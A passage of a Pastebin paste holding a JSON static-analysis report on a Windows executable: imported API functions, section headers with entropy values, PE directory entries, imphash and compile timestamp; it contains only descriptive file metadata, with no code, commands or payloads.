  1373. {
  1374. "name": "GetCurrentThread",
  1375. "address": "0x41d048"
  1376. },
  1377. {
  1378. "name": "GetTickCount",
  1379. "address": "0x41d04c"
  1380. },
  1381. {
  1382. "name": "GetStartupInfoW",
  1383. "address": "0x41d050"
  1384. }
  1385. ],
  1386. "dll": "KERNEL32.dll"
  1387. },
  1388. {
  1389. "imports": [
  1390. {
  1391. "name": "DestroyWindow",
  1392. "address": "0x41d058"
  1393. },
  1394. {
  1395. "name": "RegisterClassW",
  1396. "address": "0x41d05c"
  1397. },
  1398. {
  1399. "name": "LoadIconA",
  1400. "address": "0x41d060"
  1401. },
  1402. {
  1403. "name": "SetWindowLongW",
  1404. "address": "0x41d064"
  1405. },
  1406. {
  1407. "name": "SetWindowTextW",
  1408. "address": "0x41d068"
  1409. },
  1410. {
  1411. "name": "DefWindowProcW",
  1412. "address": "0x41d06c"
  1413. },
  1414. {
  1415. "name": "CreateWindowExA",
  1416. "address": "0x41d070"
  1417. },
  1418. {
  1419. "name": "DestroyIcon",
  1420. "address": "0x41d074"
  1421. },
  1422. {
  1423. "name": "SendMessageW",
  1424. "address": "0x41d078"
  1425. },
  1426. {
  1427. "name": "CreateWindowExW",
  1428. "address": "0x41d07c"
  1429. },
  1430. {
  1431. "name": "UnregisterClassA",
  1432. "address": "0x41d080"
  1433. },
  1434. {
  1435. "name": "LoadStringW",
  1436. "address": "0x41d084"
  1437. },
  1438. {
  1439. "name": "PostMessageW",
  1440. "address": "0x41d088"
  1441. }
  1442. ],
  1443. "dll": "USER32.dll"
  1444. },
  1445. {
  1446. "imports": [
  1447. {
  1448. "name": "CreateDIBSection",
  1449. "address": "0x41d000"
  1450. },
  1451. {
  1452. "name": "CreateBitmap",
  1453. "address": "0x41d004"
  1454. }
  1455. ],
  1456. "dll": "GDI32.dll"
  1457. },
  1458. {
  1459. "imports": [
  1460. {
  1461. "name": "CoInitialize",
  1462. "address": "0x41d0d8"
  1463. },
  1464. {
  1465. "name": "CoGetObject",
  1466. "address": "0x41d0dc"
  1467. }
  1468. ],
  1469. "dll": "ole32.dll"
  1470. },
  1471. {
  1472. "imports": [
  1473. {
  1474. "name": "__setusermatherr",
  1475. "address": "0x41d090"
  1476. },
  1477. {
  1478. "name": "_c_exit",
  1479. "address": "0x41d094"
  1480. },
  1481. {
  1482. "name": "_except_handler3",
  1483. "address": "0x41d098"
  1484. },
  1485. {
  1486. "name": "_XcptFilter",
  1487. "address": "0x41d09c"
  1488. },
  1489. {
  1490. "name": "_cexit",
  1491. "address": "0x41d0a0"
  1492. },
  1493. {
  1494. "name": "exit",
  1495. "address": "0x41d0a4"
  1496. },
  1497. {
  1498. "name": "_wcmdln",
  1499. "address": "0x41d0a8"
  1500. },
  1501. {
  1502. "name": "__wgetmainargs",
  1503. "address": "0x41d0ac"
  1504. },
  1505. {
  1506. "name": "_initterm",
  1507. "address": "0x41d0b0"
  1508. },
  1509. {
  1510. "name": "_exit",
  1511. "address": "0x41d0b4"
  1512. },
  1513. {
  1514. "name": "_adjust_fdiv",
  1515. "address": "0x41d0b8"
  1516. },
  1517. {
  1518. "name": "__p__commode",
  1519. "address": "0x41d0bc"
  1520. },
  1521. {
  1522. "name": "__p__fmode",
  1523. "address": "0x41d0c0"
  1524. },
  1525. {
  1526. "name": "__set_app_type",
  1527. "address": "0x41d0c4"
  1528. },
  1529. {
  1530. "name": "_controlfp",
  1531. "address": "0x41d0c8"
  1532. },
  1533. {
  1534. "name": "__dllonexit",
  1535. "address": "0x41d0cc"
  1536. },
  1537. {
  1538. "name": "_onexit",
  1539. "address": "0x41d0d0"
  1540. }
  1541. ],
  1542. "dll": "msvcrt.dll"
  1543. }
  1544. ],
  1545. "digital_signers": null,
  1546. "exported_dll_name": null,
  1547. "actual_checksum": "0x0001d0b3",
  1548. "overlay": {
  1549. "size": "0x00001f08",
  1550. "offset": "0x0000c000"
  1551. },
  1552. "imagebase": "0x00400000",
  1553. "reported_checksum": "0x0001d0b3",
  1554. "icon_hash": null,
  1555. "entrypoint": "0x00404636",
  1556. "timestamp": "2016-08-19 14:55:52",
  1557. "osversion": "4.0",
  1558. "sections": [
  1559. {
  1560. "name": ".text",
  1561. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1562. "virtual_address": "0x00001000",
  1563. "size_of_data": "0x00004000",
  1564. "entropy": "5.74",
  1565. "raw_address": "0x00001000",
  1566. "virtual_size": "0x00003916",
  1567. "characteristics_raw": "0xf0000020"
  1568. },
  1569. {
  1570. "name": ".bss",
  1571. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1572. "virtual_address": "0x00005000",
  1573. "size_of_data": "0x00000000",
  1574. "entropy": "0.00",
  1575. "raw_address": "0x00000000",
  1576. "virtual_size": "0x00017030",
  1577. "characteristics_raw": "0xc0000080"
  1578. },
  1579. {
  1580. "name": ".rdata",
  1581. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1582. "virtual_address": "0x0001d000",
  1583. "size_of_data": "0x00001000",
  1584. "entropy": "2.45",
  1585. "raw_address": "0x00005000",
  1586. "virtual_size": "0x000005dc",
  1587. "characteristics_raw": "0x40000040"
  1588. },
  1589. {
  1590. "name": ".data",
  1591. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1592. "virtual_address": "0x0001e000",
  1593. "size_of_data": "0x00005000",
  1594. "entropy": "6.48",
  1595. "raw_address": "0x00006000",
  1596. "virtual_size": "0x00004ef4",
  1597. "characteristics_raw": "0xd0000040"
  1598. },
  1599. {
  1600. "name": ".reloc",
  1601. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1602. "virtual_address": "0x00023000",
  1603. "size_of_data": "0x00001000",
  1604. "entropy": "0.70",
  1605. "raw_address": "0x0000b000",
  1606. "virtual_size": "0x0000024e",
  1607. "characteristics_raw": "0x42000040"
  1608. }
  1609. ],
  1610. "resources": [],
  1611. "dirents": [
  1612. {
  1613. "virtual_address": "0x00000000",
  1614. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1615. "size": "0x00000000"
  1616. },
  1617. {
  1618. "virtual_address": "0x0001d104",
  1619. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1620. "size": "0x00000078"
  1621. },
  1622. {
  1623. "virtual_address": "0x00000000",
  1624. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1625. "size": "0x00000000"
  1626. },
  1627. {
  1628. "virtual_address": "0x00000000",
  1629. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1630. "size": "0x00000000"
  1631. },
  1632. {
  1633. "virtual_address": "0x0000c000",
  1634. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1635. "size": "0x00001f08"
  1636. },
  1637. {
  1638. "virtual_address": "0x00023000",
  1639. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1640. "size": "0x0000011c"
  1641. },
  1642. {
  1643. "virtual_address": "0x00000000",
  1644. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1645. "size": "0x00000000"
  1646. },
  1647. {
  1648. "virtual_address": "0x00000000",
  1649. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1650. "size": "0x00000000"
  1651. },
  1652. {
  1653. "virtual_address": "0x00000000",
  1654. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1655. "size": "0x00000000"
  1656. },
  1657. {
  1658. "virtual_address": "0x00000000",
  1659. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1660. "size": "0x00000000"
  1661. },
  1662. {
  1663. "virtual_address": "0x00000000",
  1664. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1665. "size": "0x00000000"
  1666. },
  1667. {
  1668. "virtual_address": "0x00000000",
  1669. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1670. "size": "0x00000000"
  1671. },
  1672. {
  1673. "virtual_address": "0x0001d000",
  1674. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1675. "size": "0x000000e4"
  1676. },
  1677. {
  1678. "virtual_address": "0x00000000",
  1679. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1680. "size": "0x00000000"
  1681. },
  1682. {
  1683. "virtual_address": "0x00000000",
  1684. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1685. "size": "0x00000000"
  1686. },
  1687. {
  1688. "virtual_address": "0x00000000",
  1689. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1690. "size": "0x00000000"
  1691. }
  1692. ],
  1693. "exports": [],
  1694. "guest_signers": {},
  1695. "imphash": "ed3432959df410bdf8d52780a8c0d1d3",
  1696. "icon_fuzzy": null,
  1697. "icon": null,
  1698. "pdbpath": null,
  1699. "imported_dll_count": 5,
  1700. "versioninfo": []
  1701. }
  1702. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!